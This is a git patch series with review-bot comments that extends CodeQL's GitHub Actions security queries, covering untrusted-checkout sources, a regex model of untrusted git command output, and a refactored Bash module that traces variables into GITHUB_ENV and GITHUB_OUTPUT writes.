@@ -116,8 +200,27 @@ class ArtifactSource extends RemoteFlowSource { /** * A file from an untrusted checkout. */ -private class CheckoutSource extends RemoteFlowSource { - CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses u | + this.asExpr() = u and + u.getCallee() = "actions/checkout" and + exists(u.getArgument("ref")) + ) + or + this.asExpr() instanceof GitMutableRefCheckout + or + this.asExpr() instanceof GitSHACheckout + or + this.asExpr() instanceof GhMutableRefCheckout + or + this.asExpr() instanceof GhSHACheckout + } override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml new file mode 100644 index 000000000000..0d6c9e3bfa0a --- /dev/null +++ b/ql/lib/ext/config/untrusted_git_commands.yml 
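Review bot: The constructor of `CheckoutSource` repeats, line for line, the five-way checkout disjunction that `GitCommandSource` in the `@@ -64,6 +64,88 @@` hunk of this file also contains, together with the same explanatory comment; two copies of a workaround list will drift as soon as another checkout subclass is added. I would move it into one predicate placed next to these classes, e.g. `predicate isUntrustedCheckoutStep(Step s)`, and have both constructors use it (`this.asExpr() = s` here, `checkout = s` in `GitCommandSource`). The comment also has typos in both copies: `shoould` should be `should`, `anc` should be `and`, and the compiler error it refers to is `non-monotonic recursion`, not `non-Monolitic`.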
@@ -0,0 +1,32 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: untrustedGitCommandsDataModel
+ data:
+ # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r)
+ - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"]
+ # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore);
+ # CHANGES=$(git diff --name-only)
+ - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"]
+ # COMMIT_MESSAGE=$(git log --format=%s -n 1)
+ - [".*git\\b.*\\blog\\b.*%s.*", "text,online"]
+ # COMMIT_MESSAGE=$(git log --format=%B -n 1)
+ - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"]
+ # COMMIT_MESSAGE=$(git log --format=oneline)
+ - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"]
+ # COMMIT_MESSAGE=$(git show -s --format=%B)
+ # COMMIT_MESSAGE=$(git show -s --format=%s)
+ - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"]
+ - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"]
+ # AUTHOR=$(git log -1 --pretty=format:'%an')
+ - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"]
+ # AUTHOR=$(git show -s --pretty=%an)
+ - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"]
+ # EMAIL=$(git log -1 --pretty=format:'%ae')
+ - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"]
+ # EMAIL=$(git show -s --pretty=%ae)
+ - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"]
+ # BRANCH=$(git branch --show-current)
+ - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"]
+ # BRANCH=$(git rev-parse --abbrev-ref HEAD)
+ - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"]
From ee25f3565335dd4ee4e62188721adebb76a97b87 Mon Sep 17 00:00:00 2001
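Review bot: The two `branch` rows cannot match the commands they are annotated with, because `\\b--show-current` and `\\b--abbrev-ref` demand a word boundary immediately before `--`, and in `git branch --show-current` the character before `--` is a space; a space and `-` are both non-word characters, so there is no boundary there (the trailing `\\b` after the option is fine). Dropping the leading `\\b` fixes both: `- [".*git\\b.*\\bbranch\\b.*--show-current\\b.*", "branch,oneline"]` and `- [".*git\\b.*\\brev-parse\\b.*--abbrev-ref\\b.*", "branch,oneline"]`. The `git log --format=%s` row also carries `"text,online"` where every other single-line row says `oneline`, so whatever splits the shape part will see a third value there. Finally, `\\bdiff\\b` already matches `git diff-tree`, so the `diff-tree` row is redundant, harmless only because both rows carry the same flag.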
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:26 +0200 Subject: [PATCH 575/707] Refactor of Bash functions --- ql/lib/codeql/actions/Ast.qll | 16 + ql/lib/codeql/actions/Bash.qll | 364 ++++++++++++++++++ ql/lib/codeql/actions/Helper.qll | 239 +----------- ql/lib/codeql/actions/ast/internal/Ast.qll | 16 + .../security/ArgumentInjectionQuery.qll | 58 ++- .../security/ArtifactPoisoningQuery.qll | 18 + .../actions/security/CodeInjectionQuery.qll | 16 + .../security/EnvPathInjectionQuery.qll | 72 ++-- .../actions/security/EnvVarInjectionQuery.qll | 77 ++-- .../security/OutputClobberingQuery.qll | 134 ++++--- .../actions/security/PoisonableSteps.qll | 11 +- .../security/UntrustedCheckoutQuery.qll | 22 +- 12 files changed, 697 insertions(+), 346 deletions(-) create mode 100644 ql/lib/codeql/actions/Bash.qll diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 759bcf3f786a..cc29ceffe53b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -315,6 +315,22 @@ class Run extends Step instanceof RunImpl { } predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 000000000000..5907b601a46c --- /dev/null 
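Review bot: The four forwarding predicates added to `Run` carry no QLDoc, and the second parameter is named `output_field` even in `getAnEnvReachingGitHubEnvWrite` and `getACmdReachingGitHubEnvWrite`, where, judging by the `Bash` module they end up in, it is presumably the name written to `GITHUB_ENV` rather than an output; the same naming is mirrored in the `RunImpl` hunk `@@ -1526,6 +1526,22 @@` of `ast/internal/Ast.qll`. I would rename it to `field` in all four (or `env_var` in the two env-file ones) and document each, e.g. `/** Holds if the value of environment variable `var` may reach the write of `field` to `GITHUB_OUTPUT` in this step's script. */`, with the same treatment for the `RunImpl` copies.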
+++ b/ql/lib/codeql/actions/Bash.qll 
@@ -0,0 +1,364 @@ +private import codeql.actions.Ast +private import codeql.Locations +import codeql.actions.config.Config +private import codeql.actions.security.ControlChecks + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // 
${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + 
"(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + 
"((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = 
"GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(Run run, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = run.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } + + predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } + + predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. 
+ // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(run, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. 
+ */ + bindingset[expr] + predicate envReachingRunExpr(Run run, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + ( + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(file_write_value, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(file_write_value, cmd) + ) + ) + } +} diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 688d62acbe17..ae4405a185bd 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
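Review bot: The `$VAR` alternatives in `isParameterExpansion` and `containsParameterExpansion` use `[a-zA-Z_][a-zA-Z0-9_]+`, which needs at least two characters, so a one-letter variable such as `$f` or `$X` is never recognized, whereas the `${VAR}` alternatives right below use `*`; because `regexpCapture` has to match the whole string, `isParameterExpansion("$X", ...)` simply fails. Change both to `regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]*)\\b" and` and `regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]*)\\b.*" and`. Separately, `containsCmdSubstitution` carries the copy-pasted doc "Checks if expr is a bash command substitution" and should read "Holds if `expr` contains a bash command substitution whose body is `cmd`", and both substitution regexes stop at the first `)`, so a nested form such as `$(dirname $(pwd))` yields a truncated `cmd`; that limitation deserves a comment on the regexp line, e.g. `// nested $( ... ) is not supported; cmd is cut at the first ')'`.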
@@ -1,7 +1,8 @@ private import codeql.actions.Ast private import codeql.Locations -import codeql.actions.config.Config private import codeql.actions.security.ControlChecks +import codeql.actions.config.Config +import codeql.actions.Bash bindingset[expr] string normalizeExpr(string expr) { 
@@ -82,239 +83,3 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } - -module Bash { - string stmtSeparator() { result = ";" } - - string commandSeparator() { result = ["&&", "||"] } - - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() - } - - string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } - - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - - /** Checks if expr is a bash parameter expansion */ - bindingset[expr] - predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... 
- regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) - } - - bindingset[raw_content] - predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) - } - - bindingset[script] - predicate singleLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) - } - - bindingset[script] - predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) - } - - bindingset[script] - predicate heredocFileWrite(string script, string cmd, string file, 
string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) - } - - bindingset[script] - predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) - } - - bindingset[script] - predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) - } - - bindingset[script] - predicate 
multiLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) - } - - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) - } - - /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - bindingset[script, file_var] - predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) - } - - predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) - 
} - - predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) - } - - predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) - } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.matches("%" + snippet + "%") and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } -} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 30b57e361abd..a4b5778246a5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1526,6 +1526,22 @@ class RunImpl extends StepImpl { predicate getAWriteToGitHubPath(string value) { Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } } /** 
